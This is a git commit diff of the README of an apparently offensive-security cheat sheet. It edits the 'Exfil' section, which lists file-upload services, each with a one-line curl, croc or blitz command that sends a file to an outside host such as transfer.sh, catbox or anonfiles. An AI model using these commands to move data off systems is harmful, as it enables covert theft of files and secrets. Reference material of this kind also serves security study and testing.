mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-11 05:03:42 +02:00
Update README.md
This commit is contained in:
@@ -1471,9 +1471,10 @@ Exfil
|
||||
1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l / blitz foo.txt`
|
||||
1. [Mega](https://mega.io/cmd)
|
||||
1. ~~[BashUpload](https://bashupload.com/)~~
|
||||
2. [Transfer.sh](https://transfer.sh/) - `curl --upload-file foo.txt https://transfer.sh`
|
||||
3. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php`
|
||||
4. [Croc](https://github.com/schollz/croc) - `croc send foo.txt / croc anit-price-example`
|
||||
2. [AnonFiles](https://www.anonfiles.com) - `curl -F "file=@test.txt" https://api.anonfiles.com/upload`
|
||||
3. [Transfer.sh](https://transfer.sh/) - `curl --upload-file foo.txt https://transfer.sh`
|
||||
4. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php`
|
||||
5. [Croc](https://github.com/schollz/croc) - `croc send foo.txt / croc anit-price-example`
|
||||
6. [MagicWormhole](https://pypi.org/project/magic-wormhole/)
|
||||
|
||||
Publishing
|
||||
|
||||
Reference in New Issue
Block a user